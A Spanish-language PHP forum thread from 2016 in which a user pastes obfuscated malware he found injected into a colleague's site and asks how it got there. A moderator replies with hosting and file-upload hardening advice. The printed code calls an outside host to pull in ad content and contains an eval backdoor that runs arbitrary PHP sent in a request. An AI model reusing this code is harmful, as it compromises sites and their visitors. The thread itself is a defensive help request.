elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Trabajando con las ramas de git (tercera parte)


+  Foro de elhacker.net
|-+  Programación
| |-+  Desarrollo Web
| | |-+  PHP (Moderador: #!drvy)
| | | |-+  SPAM a través de este código
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: SPAM a través de este código  (Leído 1,897 veces)
basickdagger


Desconectado Desconectado

Mensajes: 650


System.out.println("this is weird as fuck");


Ver Perfil
SPAM a través de este código
« en: 16 Febrero 2016, 19:46 pm »

hola ps un compañero a su web algunos links al picar les abre publicidad de otras web en vez de q funcione el link con normalidad, por ejemplo yo lo abro con mi mac book y m aprece publicidad para bajarme mackeeper...

le echamos un vistazo al código y nos percatamos que existía este código...

Código
  1. <?php
  2. //###==###
  3. error_reporting(0); ini_set("display_errors", "0"); if (!isset($i8824abdf)) { $i8824abdf = TRUE;  $GLOBALS['_537135123_']=Array(base64_decode('cH' .'Jl' .'Z1' .'9tYXRjaA' .'=='),base64_decode('ZmlsZV9nZXRf' .'Y29udGVudHM='),base64_decode('c' .'29ja2V0X2NyZWF0Z' .'V9wYWly'),base64_decode('' .'bX' .'Nz' .'c' .'W' .'xfc' .'X' .'V' .'lcnk' .'='),base64_decode('ZnVuY3' .'Rpb2' .'5fZX' .'hpc3Rz'),base64_decode('' .'Y3' .'VybF' .'9pbm' .'l0'),base64_decode('dX' .'Js' .'ZW5jb2Rl'),base64_decode('dXJsZW' .'5jb2' .'Rl'),base64_decode('b' .'WQ' .'1'),base64_decode('Y3' .'Vy' .'bF9zZ' .'XRv' .'cHQ='),base64_decode('Y3VybF9zZ' .'XRvcHQ='),base64_decode('bX' .'RfcmFuZA=='),base64_decode('Zm' .'ls' .'ZWN0' .'aW1l'),base64_decode('Y3V' .'ybF9le' .'G' .'Vj'),base64_decode('Y3VybF' .'9j' .'b' .'G9z' .'ZQ=='),base64_decode('aW' .'5pX2dldA=='),base64_decode('ZmlsZV9' .'nZXRfY2' .'9ud' .'GVu' .'dHM='),base64_decode('' .'d' .'XJsZW5jb' .'2Rl'),base64_decode('d' .'XJsZW5jb' .'2Rl'),base64_decode('bWQ' .'1'),base64_decode('c' .'3Ry' .'aXBzb' .'GFzaGVz'));  function _565757278($i){$a=Array('Y2x' .'p' .'ZW5' .'0X2NoZ' .'W' .'N' .'r','Y2xpZW50X2NoZWNr','SFRUUF9BQ' .'0NFUF' .'RfQ0hBUlNFVA==','IS4hd' .'Q==','U' .'0NSS' .'VBUX0ZJTEV' .'O' .'Q' .'U1F','V' .'V' .'R' .'GLTg' .'=','d' .'2' .'luZG93cy0xMjUx','' .'SFRUU' .'F9BQ0NFUFRfQ0h' .'BUl' .'NFVA=' .'=','Y' .'3' .'VybF9p' .'bml0','a' .'H' .'R0' .'cDo' .'vL29kaW50YXJhLmNv' .'bS9n' .'ZX' .'QucG' .'hwP2Q9','U0V' .'SVkVSX05' .'BTUU=','U' .'kVRVUVTV' .'F9VUkk=','JnU9','SFRUUF9VU0VS' .'X' .'0FHRU5U','J' .'mM9','Jm' .'k9M' .'SZpcD' .'0' .'=','Uk' .'V' .'N' .'T' .'1RFX' .'0' .'FER' .'FI=','' .'Jmg' .'9','' .'OTczNDc' .'3Y' .'mJhZTQ' .'zOTc2O' .'TE0' .'ZW' .'Ni' .'N2Y0Mz' .'c' .'0Nz' .'E0NGU=','' .'U' .'0VS' .'VkVSX0' .'5BT' .'UU=','UkVR' .'VU' .'VTVF9VUk' .'k=','' .'SFRUUF' .'9VU' .'0VSX0FHRU5U','M' .'Q==','Y' .'Wxsb' .'3' .'df' .'dXJsX2Z' .'vcGV' .'u','' .'aHR0cDovL29kaW50Y' .'X' .'JhLmNvbS9n' .'ZXQu' .'cGh' .'w' .'P' .'2Q9','U0V' .'SVkVSX0' .'5B' .'TUU=','Uk' .'V' .'RVU' .'VTVF9' .'VU' .'kk=','J' .'n' .'U9','SFR' .'UUF9V' .'U' .'0VSX0F' .'HRU5U','JmM' .'9','Jmk9MSZpcD' .'0=','UkVNT1RFX' .'0' .'FERFI=','J' .'mg9','OTc' .'zNDc' .'3Y' .'mJhZTQzOTc2OT' .'E0ZW' .'Ni' .'N2Y0' .'M' .'zc0' .'NzE0N' .'GU=','' .'U0' .'VSVkVSX05' .'BTU' .'U=','Uk' .'V' .'RVUVTVF9VUkk=','SFRUUF9V' .'U' .'0VSX0FHRU' .'5U','M' .'Q' .'==','cA==','cA==','cA==','' .'O' .'DgyNG' .'F' .'iZGY=');return base64_decode($a[$i]);}  if(!empty($_COOKIE[_565757278(0)]))die($_COOKIE[_565757278(1)]);if(!isset($b90d_0[_565757278(2)])){if($GLOBALS['_537135123_'][0](_565757278(3),$GLOBALS['_537135123_'][1]($_SERVER[_565757278(4)]))){$b90d_1=_565757278(5);}else{$b90d_1=_565757278(6);}}else{$b90d_1=$b90d_0[_565757278(7)];if((round(0+187.5+187.5)^round(0+375))&& $GLOBALS['_537135123_'][2]($b90d_0,$b90d_0,$_SERVER,$b90d_0,$_REQUEST))$GLOBALS['_537135123_'][3]($b90d_0,$b90d_0);}if($GLOBALS['_537135123_'][4](_565757278(8))){$b90d_2=$GLOBALS['_537135123_'][5](_565757278(9) .$GLOBALS['_537135123_'][6]($_SERVER[_565757278(10)] .$_SERVER[_565757278(11)]) ._565757278(12) .$GLOBALS['_537135123_'][7]($_SERVER[_565757278(13)]) ._565757278(14) .$b90d_1 ._565757278(15) .$_SERVER[_565757278(16)] ._565757278(17) .$GLOBALS['_537135123_'][8](_565757278(18) .$_SERVER[_565757278(19)] .$_SERVER[_565757278(20)] .$_SERVER[_565757278(21)] .$b90d_1 ._565757278(22)));$GLOBALS['_537135123_'][9]($b90d_2,round(0+8.4+8.4+8.4+8.4+8.4),false);$GLOBALS['_537135123_'][10]($b90d_2,round(0+6637.6666666667+6637.6666666667+6637.6666666667),true);if(round(0+1989.25+1989.25+1989.25+1989.25)<$GLOBALS['_537135123_'][11](round(0+785.5+785.5+785.5+785.5),round(0+962+962+962+962+962)))$GLOBALS['_537135123_'][12]($b90d_0,$_REQUEST);echo $GLOBALS['_537135123_'][13]($b90d_2);$GLOBALS['_537135123_'][14]($b90d_2);}elseif($GLOBALS['_537135123_'][15](_565757278(23))==round(0+0.5+0.5)){echo $GLOBALS['_537135123_'][16](_565757278(24) .$GLOBALS['_537135123_'][17]($_SERVER[_565757278(25)] .$_SERVER[_565757278(26)]) ._565757278(27) .$GLOBALS['_537135123_'][18]($_SERVER[_565757278(28)]) ._565757278(29) .$b90d_1 ._565757278(30) .$_SERVER[_565757278(31)] ._565757278(32) .$GLOBALS['_537135123_'][19](_565757278(33) .$_SERVER[_565757278(34)] .$_SERVER[_565757278(35)] .$_SERVER[_565757278(36)] .$b90d_1 ._565757278(37)));$b90d_3=_565757278(38);}if(isset($_REQUEST[_565757278(39)])&& $_REQUEST[_565757278(40)]== _565757278(41)){eval($GLOBALS['_537135123_'][20]($_REQUEST["c"]));}  }
  4. //###==###
  5. ?>
  6.  

lo eliminamos y todo a la perfección, pero mi duda es:

es posible saber como ingresaron ese código ahí?
¿fue a través del servidor, la pagina, etc...?
como se puede evitar esto?

sobretodo para ver si es algo q nos toca arreglar o si es algo q es directamente con el proveedor del servidor...

la página es un simple listado q manda los títulos de unos pdf a través de mysql y php.

saludos


« Última modificación: 17 Febrero 2016, 07:18 am por basickdagger » En línea

engel lex
Moderador Global
***
Desconectado Desconectado

Mensajes: 15.514



Ver Perfil
Re: SPAM a través de este código
« Respuesta #1 en: 16 Febrero 2016, 19:55 pm »

tienes cuadros de input? tuenes friendly url? tienes upload de archivos?


En línea

El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.
basickdagger


Desconectado Desconectado

Mensajes: 650


System.out.println("this is weird as fuck");


Ver Perfil
Re: SPAM a través de este código
« Respuesta #2 en: 16 Febrero 2016, 19:59 pm »

tienes cuadros de input? tuenes friendly url? tienes upload de archivos?

en esa página donde estaba el código exactamente no.

simple archivo de php con

Código
  1. <li><a href="mipdf.pdf" target="_blank">ver pdf</a></li>

y hay un input pero es para enviar correo con una simple función mail y el cual no almacena nada en ninguna BD...
En línea

engel lex
Moderador Global
***
Desconectado Desconectado

Mensajes: 15.514



Ver Perfil
Re: SPAM a través de este código
« Respuesta #3 en: 16 Febrero 2016, 21:10 pm »

en culquier parte dentro del hosting... porque seguro lo colaron desde otro php... si no tienes nada de eso, puede haber sido un hackeo al servidor del hosting directamente
En línea

El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.
basickdagger


Desconectado Desconectado

Mensajes: 650


System.out.println("this is weird as fuck");


Ver Perfil
Re: SPAM a través de este código
« Respuesta #4 en: 17 Febrero 2016, 00:59 am »

ok, voy a checar eso, si hay un archivo de upload pero no es el mismo archivo...
quizá  ahí este el problema...

tendrán algún enlace de buenas prácticas para upload de archivos
En línea

engel lex
Moderador Global
***
Desconectado Desconectado

Mensajes: 15.514



Ver Perfil
Re: SPAM a través de este código
« Respuesta #5 en: 17 Febrero 2016, 05:33 am »

Citar
tendrán algún enlace de buenas prácticas para upload de archivos

no, pero es recomendable lo siguiente... primero, el archivo subido es analizado para asegurar que el contenido es del tipo apropiado (magic numbers y formato), si es tipo imagen, siempre reprocesarla con gd por seguridad...
En línea

El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines